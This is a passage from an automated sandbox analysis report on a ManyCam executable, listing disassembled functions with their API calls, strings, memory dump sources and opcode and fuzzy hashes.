Instruction Fuzzy Hash: ECC232B1E00219DFCB10CF9AD4945ECBBF0FF48314F2685AAD855A7215E735AAA5CF80

Function 004170D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 004170FB
GetVersionExW.KERNEL32(00000114), ref: 00417114

Strings

Z, xrefs: 0041713B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Versionmemset
String ID: Z
API String ID: 3136939366-1505515367
Opcode ID: 516b4f2a042728e0f0f59f6a94ebabed824618c26df89cb6cf625fad9862a033
Instruction ID: 947a03641c50d36fa0e939df1043f0996d18235827ec97ca73ee9231d218b9cc
Opcode Fuzzy Hash: 516b4f2a042728e0f0f59f6a94ebabed824618c26df89cb6cf625fad9862a033
Instruction Fuzzy Hash: 63017C7094522C9BDF28CF60DD0A7D8B7B4AB0A305F0001EAD54926381DB785BD8CF89

Function 0050EC90 Relevance: 4.0, APIs: 3, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a71dcc478b47e40df8151f770de63c075e4e3c067fe5a625892b148f8ef34b
Instruction ID: b9a8476a3ded02214ffd1c961f0993893401f5a1c5ac13666dc1643a7a7c18ad
Opcode Fuzzy Hash: a7a71dcc478b47e40df8151f770de63c075e4e3c067fe5a625892b148f8ef34b
Instruction Fuzzy Hash: 5DB1FA7460424ADFCB04CF44C5959AEBBB2FF45344F248A99E8595B392C332EE52DF90

Function 004B2100 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104comCOMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

CoCreateInstance.OLE32(?,00000000,00000001,00571980,00000000,?,?,0056F520,744843B1,?,?,?,?,00000000,005334CC,000000FF), ref: 004B21C6

Strings

CGraphMgr::AddFilterByCLSID name=%s, xrefs: 004B214A

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$CreateInstanceclock
String ID: CGraphMgr::AddFilterByCLSID name=%s
API String ID: 918117742-3942708501
Opcode ID: 80f2d3ddaa8d4aa783709a640ee3d22423abe0e31a3af0e214f939dcddfe5315
Instruction ID: 6627f4356a5c181cec56012d4899b026b21b0b7ca21db5bf76fe668c849b38a9
Opcode Fuzzy Hash: 80f2d3ddaa8d4aa783709a640ee3d22423abe0e31a3af0e214f939dcddfe5315
Instruction Fuzzy Hash: C2411C75900209EFDB08DF98D984BEEB7B4FB08314F10865EE815A7390DB74AA01CB64

Function 00C0A883 Relevance: 3.2, APIs: 2, Instructions: 165COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00C0AA49
_CIsqrt.MSVCR80 ref: 00C0AA5E

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Isqrt
String ID:
API String ID: 4112084577-0
Opcode ID: cb37dc015eed6d253abd2805652435cdf9235e81196ea1ca98810b8e3e26fa9d
Instruction ID: 45dbff44b264af721c7ba891b82bbb913df3e7e2dcaf579a91836d664d5dc5c5
Opcode Fuzzy Hash: cb37dc015eed6d253abd2805652435cdf9235e81196ea1ca98810b8e3e26fa9d
Instruction Fuzzy Hash: 3F5199B2A083058BC308EF5AC98115BF7E1FFC8304F458A2EE98597291E7759A45CB86

Function 00C39090 Relevance: 3.0, APIs: 2, Instructions: 518COMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 00C390E4

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 34c34371f8e1eb545619d55a3890238c5ba3dd0b07f4fe090b934e5323cee360
Instruction ID: 34e51f99186d2c96ea216e8158b7be2e856d06df0aba29d34fb2f513e3b98a28
Opcode Fuzzy Hash: 34c34371f8e1eb545619d55a3890238c5ba3dd0b07f4fe090b934e5323cee360
Instruction Fuzzy Hash: 9422E372A04A19CBD710DF18D98866DB7F4FF88314F12099CE49297368EB71E969CB81

Function 00BFA8E0 Relevance: 2.6, APIs: 1, Instructions: 1128COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00BFA94F

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: __alloca_probe_16
String ID:
API String ID: 1700504859-0
Opcode ID: e95120c9c08fcee8c72d9d1504e1b49b1a772feffd39d6423f3590deb960d826
Instruction ID: 8698c108901a1cebf3c5a29bdb0a2136792785fd443ede51a2748c1f3b01cfeb
Opcode Fuzzy Hash: e95120c9c08fcee8c72d9d1504e1b49b1a772feffd39d6423f3590deb960d826
Instruction Fuzzy Hash: 31A250B2E012099BCB05AF40D5551DCBFB4FF58794B729949E889A3239FB329D648FC0

Function 00523077 Relevance: 2.5, APIs: 2, Instructions: 12memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00416AB4,00523168,00416AB4,0041507C,00415062,?,00415062,00416AB4,?,00416AB4,?,?,?,?), ref: 00523087
HeapFree.KERNEL32(00000000,?,00415062,00416AB4,?,00416AB4,?,?,?,?), ref: 0052308E

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 441a53b93ebf16eed188891ea13d12f94a6ae03e7d81ddeafca47d4340301828
Instruction ID: f319b3c51e495ac70aa74a2a88efa86c29433e891e0bee9a04cda8eb8d13ba05
Opcode Fuzzy Hash: 441a53b93ebf16eed188891ea13d12f94a6ae03e7d81ddeafca47d4340301828
Instruction Fuzzy Hash: D1D00274914214AFDE11ABA8AE8EA493B7ABF65702F504840F216D61A1D7399848FA21

Function 00BDE120 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ade43da33c016a1955e3ef4bef1a5e35c38fadabf9303d7f37a80ce92b99389
Instruction ID: e3daa3a774f5f94eda3ed3f9d190e2b84346c51ef7c9fe1faef6d819fe75c0b7
Opcode Fuzzy Hash: 6ade43da33c016a1955e3ef4bef1a5e35c38fadabf9303d7f37a80ce92b99389
Instruction Fuzzy Hash: B212E7B7E0464597D306AF14D4152997BB4FB857A0F230E6DE885A23BDFE328D188BC1

Function 00BE0180 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176274fdc72fc0c2e13e811eac02b1d658f28edf5af668b1c7b324b10ee60b2c
Instruction ID: d988c83f98c5261c25ce42bcf535a05e0904be22e00c96f71c25c1d21abcb29e
Opcode Fuzzy Hash: 176274fdc72fc0c2e13e811eac02b1d658f28edf5af668b1c7b324b10ee60b2c
Instruction Fuzzy Hash: 66D10A73F186019BC301AF29D88525DB7E5FBC5394F628E6DE482D2269FF32C9548AC1

Function 00B982F0 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c4c31858d3a43ed35ab0a233f526fb8e015bd3639e922d8293854e0e28ec8d
Instruction ID: 3ef505cda20a88505c8ae6f5314af143cd2f8a788510df56422c923d9eceab11
Opcode Fuzzy Hash: 52c4c31858d3a43ed35ab0a233f526fb8e015bd3639e922d8293854e0e28ec8d
Instruction Fuzzy Hash: FAE1AC71A09B158BC7088F19C4942ABBBF2FFC5750F16896DE886577A8DB31C854CB82

Function 00B962A0 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ddb6c61fef1461107d7be33818a7eb5251e90fa69874308d5d88e97407d01ea
Instruction ID: 744a0f172ae80a2c15fc337b86a5959d888f29d82f5ddbab65b04f8e35d58e17
Opcode Fuzzy Hash: 5ddb6c61fef1461107d7be33818a7eb5251e90fa69874308d5d88e97407d01ea
Instruction Fuzzy Hash: 39D1DD72A09716CBCB14CF29C5841AABBE2FFD8350F16866DF885573A8E730D954CB81

Function 00BB8AF8 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced6ce7a78481b48d0ea8e5d76a6cb6d66783fba68a12f4750f8c919216917e0
Instruction ID: bd0251a92a4b5a654487e15a217436fafb37b12a5c881d17c565d08ef3f16ea3
Opcode Fuzzy Hash: ced6ce7a78481b48d0ea8e5d76a6cb6d66783fba68a12f4750f8c919216917e0
Instruction Fuzzy Hash: 67C1D671609B528BD718CF28C4942BFBBE5FFC8304F464A6DE98667298CB70D924C785

Function 00BAE8B0 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeebace7408f7e570f55c5fa30a8868c2022891155c372a2aec60564f08e5dc1
Instruction ID: 4db7e92f3f436275aeaf129a5ba3f64d2308cb185bb8f5e97a9031a8e425d8e5
Opcode Fuzzy Hash: eeebace7408f7e570f55c5fa30a8868c2022891155c372a2aec60564f08e5dc1
Instruction Fuzzy Hash: 20A14972915A228AC714CE3CC9947A7B6E2BFC4701F0EC779E8589B7ACE731D9058784

Function 00B942C0 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54db49fe0a5d46bf41e36e90e4faa4fff745359306b8e0ad02ae5497ef71eb92
Instruction ID: 53f8c63cec97698470095a893c0dfa0404118e9e40da604d095d257ff68e653f
Opcode Fuzzy Hash: 54db49fe0a5d46bf41e36e90e4faa4fff745359306b8e0ad02ae5497ef71eb92
Instruction Fuzzy Hash: CCA16B32650B068BC710CE7CC984BAAB7E5FF94700F5A867DE844873A8EB75D90AD744

Function 00BB48F8 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f44c88e727f3feec76b3cfa60b65f85cfbbca8a74bc7b8d6201c3c30055f29
Instruction ID: d8af1dd13fac38484b2511bba9036fe0392070a55190de154be05834df317f3c
Opcode Fuzzy Hash: 38f44c88e727f3feec76b3cfa60b65f85cfbbca8a74bc7b8d6201c3c30055f29
Instruction Fuzzy Hash: CAA1E271608B428BDB18CF29C8553BFBBE1FFD4315F098A6CE9A246289C774C5649782

Function 00BAE2A0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 017abfb605bd661be413fd0650b0671b7e345f01525c77e2231cc8ab7303aa15
Instruction ID: 5ae791043bf40365a7fee6d0de80371a35a5448ae4bbf6c0c7eadbf4a583f87a
Opcode Fuzzy Hash: 017abfb605bd661be413fd0650b0671b7e345f01525c77e2231cc8ab7303aa15
Instruction Fuzzy Hash: 7D81F77190E6634FDB15CD3C898026A7ED2AFDA210F0AC3B8EC649778DC676DC015790

Function 00C2E970 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d5f957c5204ed5661fbd7280a9ec56019e7818176ca9ba4da88e832a4290c7
Instruction ID: f218b6b6a24ce98afde7f7877986da353007ab4d8e869d48f879d6f5eafd503f
Opcode Fuzzy Hash: b2d5f957c5204ed5661fbd7280a9ec56019e7818176ca9ba4da88e832a4290c7
Instruction Fuzzy Hash: 2A8156769097028FC314CF69C88055AF7E2FFC8314F58CA2DE8965B719E370AA59CB81

Function 00C302C0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8806cce9c1ee632238f6f8f56872b355fab300507601d85ffba69542955a77e5
Instruction ID: bde9f2aab4b3e7bc5aca03d6f8bc0b30247c4222224993689e7b78a3890ae4e7
Opcode Fuzzy Hash: 8806cce9c1ee632238f6f8f56872b355fab300507601d85ffba69542955a77e5
Instruction Fuzzy Hash: 49811172A09706CFC304CF2AC48415AFBE2FFC8700F95CA2DE89956618D771D96ACB42

Function 00C14A83 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83f1020677db9f950864e9d29bef4c7055c83c8a653598b1861608879c9474d
Instruction ID: 6e59cde7bbdd2e10c2bc230fdd24e61f5c36204503756215bc99567fadf9c0bc
Opcode Fuzzy Hash: d83f1020677db9f950864e9d29bef4c7055c83c8a653598b1861608879c9474d
Instruction Fuzzy Hash: CE7158B190D7518F831CCF2AC49055AF7E1FFCA724F258A2EF4A997250D370D981AB86

Function 00BAC0D0 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3a27be765601d9d032c3765255d91a3e09f9e06584459f9a07c9b0396e01592
Instruction ID: a0995e17e77db309a4cb30ef17d7e6c2417ecbe6f90c8cb67fd87c456e9b77f7
Opcode Fuzzy Hash: d3a27be765601d9d032c3765255d91a3e09f9e06584459f9a07c9b0396e01592
Instruction Fuzzy Hash: C8518173E166118B8718CE7ECD8461BBAD7FFC8225B1EC77CE864576CCDA319A068640

Function 00C14860 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5198233769968465d9d0ef26af488f6c979a5bdbd84eb58c471a6e1004483efc
Instruction ID: 52b1d42b23e65b21341634120f4e5b45c914d9db2c42a16537cf576412621c9f
Opcode Fuzzy Hash: 5198233769968465d9d0ef26af488f6c979a5bdbd84eb58c471a6e1004483efc
Instruction Fuzzy Hash: 46516F71A083028FC708CF29C58055BB7E6BFC9714F258A2EF5A8D7394E771DA459B42

Function 00BAA810 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
